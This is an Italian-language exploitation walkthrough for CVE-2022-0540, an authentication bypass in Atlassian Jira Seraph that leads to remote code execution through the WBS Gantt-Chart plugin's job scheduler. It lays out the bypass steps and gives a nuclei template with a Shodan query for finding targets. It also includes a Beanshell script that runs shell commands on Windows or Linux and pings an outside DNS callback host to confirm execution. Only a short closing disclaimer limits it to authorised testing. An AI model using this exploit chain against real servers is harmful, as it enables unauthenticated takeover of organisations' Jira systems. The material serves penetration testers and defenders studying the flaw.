
Atlassian Jira Seraph Bypass di Autenticazione RCE(CVE-2022-0540)
Come si vede nel blog dell'autore, atlassian ha fornito una lunga lista di plugin interessati (la stragrande maggioranza dei quali erano falsi positivi), e l'autore ha elencato diversi plugin effettivamente interessati.

Secondo le condizioni indicate, combinate con la documentazione ufficiale per WBS Gantt-Chart for Jira

In sostanza, è un RCE che utilizza lo Beanshell Script del modulo del job scheduler Task; i dettagli dello sfruttamento sono i seguenti.
Proxy > Options > Match and Replace, modificare la regola.
http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa; poi puoi controllare la job scheduler configuration
Dal momento che il nostro script Beanshell finale viene eseguito come attività programmata, puoi modificare l'intervallo di esecuzione per tua comodità facendo clic su Modifica e modificandolo secondo il formato Cron.


Dopo aver completato la configurazione, fai clic su Aggiorna ma verrai reindirizzato alla pagina di login; non preoccuparti, il Task è stato effettivamente aggiunto in background.

Il Task appena creato è Disabilitato per impostazione predefinita; devi impostarlo manualmente su Abilitato e quindi attendere qualche secondo per l'esecuzione dello Script.

allo stesso tempo, puoi trovare il prompt che indica il completamento dell'esecuzione nel job scheduler.

Prerequisiti
WBS Gantt-Chart for Jira <= 9.14.3.1
id: CVE-2022-0540
info:
name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
author: DhiyaneshDK
severity: critical
description: |
Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
reference:
- https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0540
- https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0540
cwe-id: CWE-287
metadata:
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2022,atlassian,jira,exposure,auth-bypass
requests:
- method: GET
path:
- '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'WBS Gantt-Chart'
- type: regex
regex:
- '<td headers="name">([.|\D]*?)</td>'
dsl: []
- type: status
status:
- 200
Esecuzione demo
nuclei -l targets.txt -t exploit.yaml
Screenshot

Beanshell Script
import java.io.IOException;
import java.lang.*;
Runtime runtime = Runtime.getRuntime();
try {
String command = "ping -nc 1 55d2721a.dns.1433.eu.org";
if (System.getProperty("os.name").toLowerCase().contains("windows")) {
runtime.exec(new String[]{"cmd.exe", "/c", command});
} else {
runtime.exec(new String[]{"/bin/bash", "-c", command});
}
} catch (IOException e) {
e.printStackTrace();
}
Le informazioni menzionate in questo articolo sono destinate esclusivamente a test di penetrazione legittimi e autorizzati, controlli di sicurezza interni dell'azienda e scopi di ricerca. L'utente è responsabile di qualsiasi conseguenza avversa derivante dall'utilizzo delle informazioni fornite in questo articolo.